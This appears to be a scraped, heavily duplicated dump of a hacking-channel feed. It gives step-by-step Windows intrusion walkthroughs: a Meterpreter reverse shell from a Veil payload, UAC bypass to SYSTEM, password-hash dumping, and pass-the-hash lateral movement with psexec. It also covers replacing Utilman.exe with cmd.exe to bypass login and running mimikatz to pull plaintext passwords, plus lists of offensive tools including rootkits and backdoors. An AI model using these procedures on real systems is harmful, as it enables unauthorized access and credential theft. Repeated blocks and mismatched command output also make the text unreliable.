alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
From the output, you can see that the hashed password values of six users were captured. At this point, you can use the SMB psexec module to bypass the hash value.
5) Run session 2 in the background. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 2β¦
6) Use the SMB psexec module and set the required configuration option parameters. The execution command is as follows:
msf exploit(bypassuac) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.6.114
RHOST => 192.168.6.114
msf exploit(psexec) > set SMBUser Test
SMBUser => alice
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:
22315d6ed1a7d5f8a7c98c40e9fa2dec
SMBPass => aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec
π¦if You think that cracking LM Hashes is too slow, you can use the psexec module in Metasploit to bypass the hash value. The method of bypassing the hash value using the psexec module will be described below:
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) By running the executable file backup.exe created by Veil on the target host (Windows 7), successfully obtain an active remote session, as shown below:
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handlerβ¦
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:29:55 +0800
From the above information, you can see that Session 1 was successfully opened.
2) View user rights information. The execution command is as follows:
meterpreter > getuid
Server username: WIN-RKPKQFBLG6C\lyw
From the output information, you can see that the user's permission is a normal permission. Next, bypass the UAC using the bypassuac module.
3) Set lyw users to bypass UAC. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 1β¦
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] UAC is Enabled, checking levelβ¦
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuingβ¦
[+] Part of Administrators group! Continuingβ¦
[*] Uploaded the agent to the filesystemβ¦.
[*] Uploading the bypass UAC executable to the filesystemβ¦
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:34:38 +0800
meterpreter > getsystem
β¦got system (via technique 1).
meterpreter > getuid
> Server username: NT AUTHORITY\SYSTEM
From the output information, you can see that the lyw user authority is SYSTEM at this time.
4) View the hash password values of all users on the target host. The execution command is as follows:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot keyβ¦
[*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa174b19daeβ¦
[*] Obtaining the user list and keysβ¦
[*] Decrypting user keysβ¦
[*] Dumping password hintsβ¦
Test:"123"
[*] Dumping password hashesβ¦
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
From the output, you can see that the hashed password values of six users were captured. At this point, you can use the SMB psexec module to bypass the hash value.
5) Run session 2 in the background. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 2β¦
6) Use the SMB psexec module and set the required configuration option parameters. The execution command is as follows:
msf exploit(bypassuac) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.6.114
RHOST => 192.168.6.114
msf exploit(psexec) > set SMBUser Test
SMBUser => alice
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:
22315d6ed1a7d5f8a7c98c40e9fa2dec
SMBPass => aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec
Forwarded from U
7) Start the attack. The execution command is as follows:
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Connecting to the serverβ¦
[*] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'β¦
[*] Uploading payloadβ¦
[*] Created \XBotpcOY.exeβ¦
[*] Deleting \XBotpcOY.exeβ¦
[*] Sending stage (769536 bytes) to 192.168.6.114
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 17:32:13 +0800
From the output information, you can see that the user using "Test" successfully opened a session
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Connecting to the serverβ¦
[*] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'β¦
[*] Uploading payloadβ¦
[*] Created \XBotpcOY.exeβ¦
[*] Deleting \XBotpcOY.exeβ¦
[*] Sending stage (769536 bytes) to 192.168.6.114
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 17:32:13 +0800
From the output information, you can see that the user using "Test" successfully opened a session
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Bypassing Utilman Login for Windows by Underc0de :
> Utilman is a Windows accessibility manager.
> This program is the most important file stored in the Windows system files. Usually
> it is automatically created during the system installation process, which is very important for the normal operation of the system. Under Windows, you can use the Windows + U key combination to call the Utilman process. This section describes how to bypass the Utilman program and log in to the system to run other operations.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In the Windows interface, start Kali Linux LiveCD
2) Select Live (686-pae) on this interface, and press Enter to start Kali Linux
3) the interface displays files and folders in the Windows operating system. Here open the Windows | System32 folder in turn
4) Find the Utilman.exe file in the folder and rename the file to Utilman.old. Then copy the cmd.exe file and change its file name to Utilman.exe.
5) Now close Kali Linux and start Windows. Press the Windows + u key combination on the login interface
6 ) From this interface, you can see that a command prompt window opens. In this window, you can execute some DOS commands. For example, using the whoami command to view user information will display the cmd interface
7) As can be seen from the output interface, the current user has the highest authority. At this point, you can perform any operation.
After learning to bypass Utilman login, you can use the mimikatz tool to restore the user's password when the target system is locked.
> The following will introduce the use of mimikatz tools to recover passwords from locked state.
8) You need to do some preparation before operation. First download the mimikatz tool from http://blog.gentilkiwi.com/mimikatz(Official ) . Its package name is mimikatz_trunk.zip. Extract the package and save it to a USB disk. In this example, save the decompressed file to the mimikatz directory of the USB flash drive.
π¦ well now see next Step> Cracking the Windows
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Bypassing Utilman Login for Windows by Underc0de :
> Utilman is a Windows accessibility manager.
> This program is the most important file stored in the Windows system files. Usually
> it is automatically created during the system installation process, which is very important for the normal operation of the system. Under Windows, you can use the Windows + U key combination to call the Utilman process. This section describes how to bypass the Utilman program and log in to the system to run other operations.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In the Windows interface, start Kali Linux LiveCD
2) Select Live (686-pae) on this interface, and press Enter to start Kali Linux
3) the interface displays files and folders in the Windows operating system. Here open the Windows | System32 folder in turn
4) Find the Utilman.exe file in the folder and rename the file to Utilman.old. Then copy the cmd.exe file and change its file name to Utilman.exe.
5) Now close Kali Linux and start Windows. Press the Windows + u key combination on the login interface
6 ) From this interface, you can see that a command prompt window opens. In this window, you can execute some DOS commands. For example, using the whoami command to view user information will display the cmd interface
7) As can be seen from the output interface, the current user has the highest authority. At this point, you can perform any operation.
After learning to bypass Utilman login, you can use the mimikatz tool to restore the user's password when the target system is locked.
> The following will introduce the use of mimikatz tools to recover passwords from locked state.
8) You need to do some preparation before operation. First download the mimikatz tool from http://blog.gentilkiwi.com/mimikatz(Official ) . Its package name is mimikatz_trunk.zip. Extract the package and save it to a USB disk. In this example, save the decompressed file to the mimikatz directory of the USB flash drive.
π¦ well now see next Step> Cracking the Windows
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now Let s Crack The Windows Login
> Install Utilman Bypass in the system to be able to execute some commands.
t.me/UndercOdeTesting
1) Press the Windows + u key combination on the locked Windows desktop
2) by default, when the Windows + u key combination is used to start a DOS window, the height of the window buffer is 30. When outputting more data, you will not see everything. Therefore, you need to increase the height of the window in the properties menu of the DOS window
3) select the "Layout" tab on this interface and modify the height value below the screen buffer size. Then click the "OK" button to scroll the mouse to see everything.
4) At this point, execute some commands on the command line to recover the Windows user password. First confirm the permissions of the current user, execute the command as follows:
C:\Windows\system32> UndercOde
nt authority\system
5) Enter the USB disk and check the contents of the disk. The USB disk number F: in this example, the execution command is as follows:
C:\Windows\system32> F:
F:\>dir mimikatz
2019/05/26 03:45 4,311 README.md
2019/06/15 04:54 Win32
2019/06/15 04:54 x64
6) From the output, you can see that there are three files in the mimikatz directory. Win32 and x64 represent the two versions of mimikatz. Choose the corresponding version according to your system architecture. The operating system in this example is 32-bit, so Win32 is chosen.
7) View the contents of the Win32 directory:
F:\>cd mimikatz
F:\Mimikatz>cd win32
F:\Mimikatz\Win32>dir
2019/06/15 04:54 29,056 mimidrv.sys
2019/06/15 04:54 189,936 mimikatz.exe
2019/06/15 04:54 27,632 mimilib.dll
8) From the output, you can see that there are three files in the Win32 directory. Among them, mimikatz is an executable file.
π¦ Run the mimikatz program :
The mimikatz # prompt indicates that you have successfully logged in to the mimikatz program.
1) Recover password. The execution command is as follows:
mimikatz # sekurlsa::logonPasswords
or:
2) mimikatz # sekurlsa::logonPasswords full
π¦ The following information is output:
Authentication Id : 0; 10201252 (00000000:009ba8a4)
Session : Interactive from 1
User Name : UndercOde
Domain : Windows7Test
SID : S-1-5-21-2306344666-604645106-2825843324-1001
msv :
[00010000] CredentialKeys
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
[00000003] Primary
* Username : UndercOde
* Domain : Windows7Test
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
π¦ wdigest :
* Username : UndercOde
* Domain : Windows7Test
* Password : 123456
> kerberos :
* Username : UndercOde
* Domain : Windows7Test
* Password : (null)
> ssp :
credman :
π¦ From the above output information, you can see all the information of the locked user. Such as user name, various encrypted HASH values, domain name and password.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now Let s Crack The Windows Login
> Install Utilman Bypass in the system to be able to execute some commands.
t.me/UndercOdeTesting
1) Press the Windows + u key combination on the locked Windows desktop
2) by default, when the Windows + u key combination is used to start a DOS window, the height of the window buffer is 30. When outputting more data, you will not see everything. Therefore, you need to increase the height of the window in the properties menu of the DOS window
3) select the "Layout" tab on this interface and modify the height value below the screen buffer size. Then click the "OK" button to scroll the mouse to see everything.
4) At this point, execute some commands on the command line to recover the Windows user password. First confirm the permissions of the current user, execute the command as follows:
C:\Windows\system32> UndercOde
nt authority\system
5) Enter the USB disk and check the contents of the disk. The USB disk number F: in this example, the execution command is as follows:
C:\Windows\system32> F:
F:\>dir mimikatz
2019/05/26 03:45 4,311 README.md
2019/06/15 04:54 Win32
2019/06/15 04:54 x64
6) From the output, you can see that there are three files in the mimikatz directory. Win32 and x64 represent the two versions of mimikatz. Choose the corresponding version according to your system architecture. The operating system in this example is 32-bit, so Win32 is chosen.
7) View the contents of the Win32 directory:
F:\>cd mimikatz
F:\Mimikatz>cd win32
F:\Mimikatz\Win32>dir
2019/06/15 04:54 29,056 mimidrv.sys
2019/06/15 04:54 189,936 mimikatz.exe
2019/06/15 04:54 27,632 mimilib.dll
8) From the output, you can see that there are three files in the Win32 directory. Among them, mimikatz is an executable file.
π¦ Run the mimikatz program :
The mimikatz # prompt indicates that you have successfully logged in to the mimikatz program.
1) Recover password. The execution command is as follows:
mimikatz # sekurlsa::logonPasswords
or:
2) mimikatz # sekurlsa::logonPasswords full
π¦ The following information is output:
Authentication Id : 0; 10201252 (00000000:009ba8a4)
Session : Interactive from 1
User Name : UndercOde
Domain : Windows7Test
SID : S-1-5-21-2306344666-604645106-2825843324-1001
msv :
[00010000] CredentialKeys
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
[00000003] Primary
* Username : UndercOde
* Domain : Windows7Test
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
π¦ wdigest :
* Username : UndercOde
* Domain : Windows7Test
* Password : 123456
> kerberos :
* Username : UndercOde
* Domain : Windows7Test
* Password : (null)
> ssp :
credman :
π¦ From the above output information, you can see all the information of the locked user. Such as user name, various encrypted HASH values, domain name and password.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from U
Those Cracking Tutorials for learn, Not for steal π¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Termux-Linux Tools lastest :
pinterest.com/UndercOdeOfficial
android-apktool 1.5.2 A tool for reengineering Android apk files. http://forum.xda-developers.com/showthread.php?t=1755243
android-ndk r9c Android C/C++ developer kit. http://developer.android.com/sdk/ndk/index.html
android-sdk-platform-tools r19 Platform-Tools for Google Android SDK (adb and fastboot) http://developer.android.com/sdk/index.html
android-sdk r22.3 Google Android SDK http://developer.android.com/sdk/index.html
android-udev-rules 8340.db8ef4a Android udev rules. https://github.com/bbqlinux/android-udev-rules
androidsniffer 0.1 A perl script that lets you search for 3rd party passwords, dump the call log, dump contacts, dump wireless configuration, and more. http://packetstormsecurity.com/files/97464/Andr01d-Magic-Dumper.1.html
anontwi 1.0 A free software python client designed to navigate anonymously on social networks. It supports Identi.ca and Twitter.com. http://anontwi.sourceforge.net/
aphopper 0.3 AP Hopper is a program that automatically hops between access points of different wireless networks. http://aphopper.sourceforge.net/
apnbf 0.1 A small python script designed for enumerating valid APNs (Access Point Name) on a GTP-C speaking device. http://www.c0decafe.de/
arachni 1.0.6 A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. https://www.arachni-scanner.com
arduino 1.0.5 Arduino SDK (includes patched avrdude and librxtx) http://arduino.cc/en/Main/Software
argus 3.0.8 Network monitoring tool with flow control. http://qosient.com/argus/
argus-clients 3.0.8 Network monitoring client for Argus. http://qosient.com/argus/
armitage 141120 A graphical cyber attack management tool for Metasploit. http://www.fastandeasyhacking.com/
arp-scan 1.9 A tool that uses ARP to discover and fingerprint IP hosts on the local network http://www.nta-monitor.com/tools/arp-scan/
arpalert 2.0.12 Monitor ARP changes in ethernet networks http://www.arpalert.org/
arpantispoofer 1.0.1.32 A utility to detect and resist BIDIRECTIONAL ARP spoofing. It can anti-spoof for not only the local host, but also other hosts in the same subnet. It is also a handy helper for gateways which don't work well with ARP. http://arpantispoofer.sourceforge.net/
arpoison 0.6 The UNIX arp cache update utility http://www.arpoison.net
arpon 2.7 A portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. http://arpon.sourceforge.net/
arpwner 26.f300fdf GUI-based python tool for arp posioning and dns poisoning attacks. https://github.com/ntrippar/ARPwner
artillery 1.0.2 A combination of a honeypot, file-system monitoring, system hardening, and overall health of a server to create a comprehensive way to secure a system https://www.trustedsec.com/downloads/artillery/
asleap 2.2 Actively recover LEAP/PPTP passwords. http://www.willhackforsushi.com/Asleap.html
asp-audit 2BETA An ASP fingerprinting tool and vulnerability scanner. http://seclists.org/basics/2006/Sep/128
athena-ssl-scanner 0.5.2 a SSL cipher scanner that checks all cipher codes. It can identify about 150 different ciphers. http://packetstormsecurity.com/files/93062/Athena-SSL-Cipher-Scanner.html
atstaketools 0.1 This is an archive of various @Stake tools that help perform vulnerability scanning and analysis, information gathering, password auditing, and forensics. http://packetstormsecurity.com/files/50718/AtStakeTools.zip.html
autopsy 2.24 A GUI for The Sleuth Kit. http://www.sleuthkit.org/autopsy
azazel 10.401e3aa A userland rootkit based off of the original LD_PRELOAD technique from Jynx rootkit. https://github.com/chokepoint/azazel
backcookie 44.cbf5b8b Small backdoor using cookie. https://github.com/mrjopino/backcookie
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Termux-Linux Tools lastest :
pinterest.com/UndercOdeOfficial
android-apktool 1.5.2 A tool for reengineering Android apk files. http://forum.xda-developers.com/showthread.php?t=1755243
android-ndk r9c Android C/C++ developer kit. http://developer.android.com/sdk/ndk/index.html
android-sdk-platform-tools r19 Platform-Tools for Google Android SDK (adb and fastboot) http://developer.android.com/sdk/index.html
android-sdk r22.3 Google Android SDK http://developer.android.com/sdk/index.html
android-udev-rules 8340.db8ef4a Android udev rules. https://github.com/bbqlinux/android-udev-rules
androidsniffer 0.1 A perl script that lets you search for 3rd party passwords, dump the call log, dump contacts, dump wireless configuration, and more. http://packetstormsecurity.com/files/97464/Andr01d-Magic-Dumper.1.html
anontwi 1.0 A free software python client designed to navigate anonymously on social networks. It supports Identi.ca and Twitter.com. http://anontwi.sourceforge.net/
aphopper 0.3 AP Hopper is a program that automatically hops between access points of different wireless networks. http://aphopper.sourceforge.net/
apnbf 0.1 A small python script designed for enumerating valid APNs (Access Point Name) on a GTP-C speaking device. http://www.c0decafe.de/
arachni 1.0.6 A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. https://www.arachni-scanner.com
arduino 1.0.5 Arduino SDK (includes patched avrdude and librxtx) http://arduino.cc/en/Main/Software
argus 3.0.8 Network monitoring tool with flow control. http://qosient.com/argus/
argus-clients 3.0.8 Network monitoring client for Argus. http://qosient.com/argus/
armitage 141120 A graphical cyber attack management tool for Metasploit. http://www.fastandeasyhacking.com/
arp-scan 1.9 A tool that uses ARP to discover and fingerprint IP hosts on the local network http://www.nta-monitor.com/tools/arp-scan/
arpalert 2.0.12 Monitor ARP changes in ethernet networks http://www.arpalert.org/
arpantispoofer 1.0.1.32 A utility to detect and resist BIDIRECTIONAL ARP spoofing. It can anti-spoof for not only the local host, but also other hosts in the same subnet. It is also a handy helper for gateways which don't work well with ARP. http://arpantispoofer.sourceforge.net/
arpoison 0.6 The UNIX arp cache update utility http://www.arpoison.net
arpon 2.7 A portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. http://arpon.sourceforge.net/
arpwner 26.f300fdf GUI-based python tool for arp posioning and dns poisoning attacks. https://github.com/ntrippar/ARPwner
artillery 1.0.2 A combination of a honeypot, file-system monitoring, system hardening, and overall health of a server to create a comprehensive way to secure a system https://www.trustedsec.com/downloads/artillery/
asleap 2.2 Actively recover LEAP/PPTP passwords. http://www.willhackforsushi.com/Asleap.html
asp-audit 2BETA An ASP fingerprinting tool and vulnerability scanner. http://seclists.org/basics/2006/Sep/128
athena-ssl-scanner 0.5.2 a SSL cipher scanner that checks all cipher codes. It can identify about 150 different ciphers. http://packetstormsecurity.com/files/93062/Athena-SSL-Cipher-Scanner.html
atstaketools 0.1 This is an archive of various @Stake tools that help perform vulnerability scanning and analysis, information gathering, password auditing, and forensics. http://packetstormsecurity.com/files/50718/AtStakeTools.zip.html
autopsy 2.24 A GUI for The Sleuth Kit. http://www.sleuthkit.org/autopsy
azazel 10.401e3aa A userland rootkit based off of the original LD_PRELOAD technique from Jynx rootkit. https://github.com/chokepoint/azazel
backcookie 44.cbf5b8b Small backdoor using cookie. https://github.com/mrjopino/backcookie
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Termux-Linux Tools lastest Part 2 :
pinterest.com/UndercOdeOfficial
backdoor-factory 98.89d87b2 Patch win32/64 binaries with shellcode. https://github.com/secretsquirrel/the-backdoor-factory
backfuzz 36.8e54ed6 A network protocol fuzzing toolkit. https://github.com/localh0t/backfuzz
balbuzard 65.546c5dcf629c A package of malware analysis tools in python to extract patterns of interest from suspicious files (IP addresses, domain names, known file headers, interesting strings, etc). https://bitbucket.org/decalage/balbuzard/
bamf-framework 35.30d2b4b A modular framework designed to be a platform to launch attacks against botnets. https://github.com/bwall/BAMF
basedomainname 0.1 Tool that can extract TLD (Top Level Domain), domain extensions (Second Level Domain + TLD), domain name, and hostname from fully qualified domain names. http://www.morningstarsecurity.com/research
batman-adv 2013.4.0 batman kernel module, (included upstream since .38) http://www.open-mesh.net/
bbqsql 1.2 SQL injection exploitation tool. https://github.com/neohapsis/bbqsql
bdfproxy 38.43e83e4 Patch Binaries via MITM: BackdoorFactory + mitmProxy https://github.com/secretsquirrel/BDFProxy
bed 0.5 Collection of scripts to test for buffer overflows, format string vulnerabilities. http://www.aldeid.com/wiki/Bed
beef 0.4.5.0.181.g80a9f8e The Browser Exploitation Framework that focuses on the web browser http://beefproject.com/
beholder 0.8.9 A wireless intrusion detection tool that looks for anomalies in a wifi environment. http://www.beholderwireless.org/
beleth 36.0963699 A Multi-threaded Dictionary based SSH cracker. https://github.com/chokepoint/Beleth
bfbtester 2.0.1 Performs checks of single and multiple argument command line overflows and environment variable overflows http://sourceforge.net/projects/bfbtester/
bgp-md5crack 0.1 RFC2385 password cracker http://www.c0decafe.de/
bing-ip2hosts 0.4 Enumerates all hostnames which Bing has indexed for a specific IP address. http://www.morningstarsecurity.com/research/bing-ip2hosts
bing-lfi-rfi 0.1 This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities. http://packetstormsecurity.com/files/121590/Bing-LFI-RFI-Scanner.html
binwalk 2.0.1 A tool for searching a given binary image for embedded files. http://binwalk.org
binwally 3.ca092a7 Binary and Directory tree comparison tool using the Fuzzy Hashing concept (ssdeep). https://github.com/bmaia/binwally
bios_memimage 1.2 A tool to dump RAM contents to disk (aka cold boot attack). http://citp.princeton.edu/memory/code/
birp 60.1d7c49f A tool that will assist in the security assessment of mainframe applications served over TN3270. https://github.com/sensepost/birp
bittwist 2.0 A simple yet powerful libpcap-based Ethernet packet generator. It is designed to complement tcpdump, which by itself has done a great job at capturing network traffic. http://bittwist.sourceforge.net/
bkhive 1.1.1 Program for dumping the syskey bootkey from a Windows NT/2K/XP system hive. http://sourceforge.net/projects/ophcrack
blackarch-menus 0.2 BlackArch specific XDG-compliant menu http://www.blackarch.org/
blackhash 0.2 Creates a filter from system hashes http://16s.us/blackhash/
bletchley 0.0.1 A collection of practical application cryptanalysis tools. https://code.google.com/p/bletchley/
blindelephant 7 A web application fingerprinter. Attempts to discover the version of a (known) web application by comparing static files at known locations http://blindelephant.sourceforge.net/
blindsql 1.0 Set of bash scripts for blind SQL injection attacks http://www.enye-sec.org/programas.html
bluebox-ng 66.4a73bb4 A GPL VoIP/UC vulnerability scanner. https://github.com/jesusprubio/bluebox-ng
bluebugger 0.1 An implementation of the bluebug technique which was discovered by Martin Herfurt. http://packetstormsecurity.com/files/54024/bluebugger.1.tar.gz.html
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Termux-Linux Tools lastest Part 2 :
pinterest.com/UndercOdeOfficial
backdoor-factory 98.89d87b2 Patch win32/64 binaries with shellcode. https://github.com/secretsquirrel/the-backdoor-factory
backfuzz 36.8e54ed6 A network protocol fuzzing toolkit. https://github.com/localh0t/backfuzz
balbuzard 65.546c5dcf629c A package of malware analysis tools in python to extract patterns of interest from suspicious files (IP addresses, domain names, known file headers, interesting strings, etc). https://bitbucket.org/decalage/balbuzard/
bamf-framework 35.30d2b4b A modular framework designed to be a platform to launch attacks against botnets. https://github.com/bwall/BAMF
basedomainname 0.1 Tool that can extract TLD (Top Level Domain), domain extensions (Second Level Domain + TLD), domain name, and hostname from fully qualified domain names. http://www.morningstarsecurity.com/research
batman-adv 2013.4.0 batman kernel module, (included upstream since .38) http://www.open-mesh.net/
bbqsql 1.2 SQL injection exploitation tool. https://github.com/neohapsis/bbqsql
bdfproxy 38.43e83e4 Patch Binaries via MITM: BackdoorFactory + mitmProxy https://github.com/secretsquirrel/BDFProxy
bed 0.5 Collection of scripts to test for buffer overflows, format string vulnerabilities. http://www.aldeid.com/wiki/Bed
beef 0.4.5.0.181.g80a9f8e The Browser Exploitation Framework that focuses on the web browser http://beefproject.com/
beholder 0.8.9 A wireless intrusion detection tool that looks for anomalies in a wifi environment. http://www.beholderwireless.org/
beleth 36.0963699 A Multi-threaded Dictionary based SSH cracker. https://github.com/chokepoint/Beleth
bfbtester 2.0.1 Performs checks of single and multiple argument command line overflows and environment variable overflows http://sourceforge.net/projects/bfbtester/
bgp-md5crack 0.1 RFC2385 password cracker http://www.c0decafe.de/
bing-ip2hosts 0.4 Enumerates all hostnames which Bing has indexed for a specific IP address. http://www.morningstarsecurity.com/research/bing-ip2hosts
bing-lfi-rfi 0.1 This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities. http://packetstormsecurity.com/files/121590/Bing-LFI-RFI-Scanner.html
binwalk 2.0.1 A tool for searching a given binary image for embedded files. http://binwalk.org
binwally 3.ca092a7 Binary and Directory tree comparison tool using the Fuzzy Hashing concept (ssdeep). https://github.com/bmaia/binwally
bios_memimage 1.2 A tool to dump RAM contents to disk (aka cold boot attack). http://citp.princeton.edu/memory/code/
birp 60.1d7c49f A tool that will assist in the security assessment of mainframe applications served over TN3270. https://github.com/sensepost/birp
bittwist 2.0 A simple yet powerful libpcap-based Ethernet packet generator. It is designed to complement tcpdump, which by itself has done a great job at capturing network traffic. http://bittwist.sourceforge.net/
bkhive 1.1.1 Program for dumping the syskey bootkey from a Windows NT/2K/XP system hive. http://sourceforge.net/projects/ophcrack
blackarch-menus 0.2 BlackArch specific XDG-compliant menu http://www.blackarch.org/
blackhash 0.2 Creates a filter from system hashes http://16s.us/blackhash/
bletchley 0.0.1 A collection of practical application cryptanalysis tools. https://code.google.com/p/bletchley/
blindelephant 7 A web application fingerprinter. Attempts to discover the version of a (known) web application by comparing static files at known locations http://blindelephant.sourceforge.net/
blindsql 1.0 Set of bash scripts for blind SQL injection attacks http://www.enye-sec.org/programas.html
bluebox-ng 66.4a73bb4 A GPL VoIP/UC vulnerability scanner. https://github.com/jesusprubio/bluebox-ng
bluebugger 0.1 An implementation of the bluebug technique which was discovered by Martin Herfurt. http://packetstormsecurity.com/files/54024/bluebugger.1.tar.gz.html
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Termux-Linux Tools lastest Part 3 :
pinterest.com/UndercOdeOfficial
bluepot 0.1 A Bluetooth Honeypot written in Java, it runs on Linux https://github.com/andrewmichaelsmith/bluepot/
blueprint 0.1_3 A perl tool to identify Bluetooth devices. http://trifinite.org/trifinite_stuff_blueprinting.html
blueranger 1.0 A simple Bash script which uses Link Quality to locate Bluetooth device radios. http://www.hackfromacave.com/projects/blueranger.html
bluesnarfer 0.1 A bluetooth attacking tool http://www.alighieri.org/project.html
bmap-tools 3.2 Tool for copying largely sparse files using information from a block map file. http://git.infradead.org/users/dedekind/bmap-tools.git
bob-the-butcher 0.7.1 A distributed password cracker package. http://btb.banquise.net/
bowcaster 0.1 This framework, implemented in Python, is intended to aid those developing exploits by providing useful set of tools and modules, such as payloads, encoders, connect-back servers, etc. Currently the framework is focused on the MIPS CPU architecture, but the design is intended to be modular enough to support arbitrary architectures. https://github.com/zcutlip/bowcaster
braa 0.82 A mass snmp scanner http://s-tech.elsat.net.pl/braa/
braces 0.4 A Bluetooth Tracking Utility. http://braces.shmoo.com/
bruteSniffing_Ficher A multiplatform python hacking tool for bruteforcing, cloning, fishing, information gathering and sniffing. https://github.com/programmingAthlete/BruteSniffing_Fisher
brutus 2 One of the fastest, most flexible remote password crackers you can get your hands on. http://www.hoobie.net/brutus/
bsdiff 4.3 bsdiff and bspatch are tools for building and applying patches to binary files. http://www.daemonology.net/bsdiff/
bsqlbf 2.7 Blind SQL Injection Brute Forcer. http://code.google.com/p/bsqlbf-v2/
bss 0.8 Bluetooth stack smasher / fuzzer http://www.secuobs.com/news/15022006-bss_0_8.shtml
bt_audit 0.1.1 Bluetooth audit http://www.betaversion.net/btdsd/download/
btcrack 1.1 The world's first Bluetooth Pass phrase (PIN) bruteforce tool. Bruteforces the Passkey and the Link key from captured Pairing exchanges. http://www.nruns.com/_en/security_tools_btcrack.php
btscanner 2.1 Bluetooth device scanner. http://www.pentest.co.uk
bulk-extractor 1.5.5 Bulk Email and URL extraction tool. https://github.com/simsong/bulk_extractor
bully 19.ba33677 A wifi-protected-setup (WPS) brute force attack tool. http://code.google.com/p/bully/
bunny 0.93 A closed loop, high-performance, general purpose protocol-blind fuzzer for C programs. http://code.google.com/p/bunny-the-fuzzer/
burpsuite 1.6 An integrated platform for attacking web applications (free edition). http://portswigger.net/burp/
buttinsky 138.1a2a1b2 Provide an open source framework for automated botnet monitoring. https://github.com/buttinsky/buttinsky
bvi 1.4.0beta A display-oriented editor for binary files operate like "vi" editor. http://bvi.sourceforge.net/
cadaver 0.23.3 Command-line WebDAV client for Unix http://www.webdav.org/cadaver
canari 1.1 A transform framework for maltego http://www.canariproject.com/
cansina 93.abc6577 A python-based Web Content Discovery Tool. https://github.com/deibit/cansina
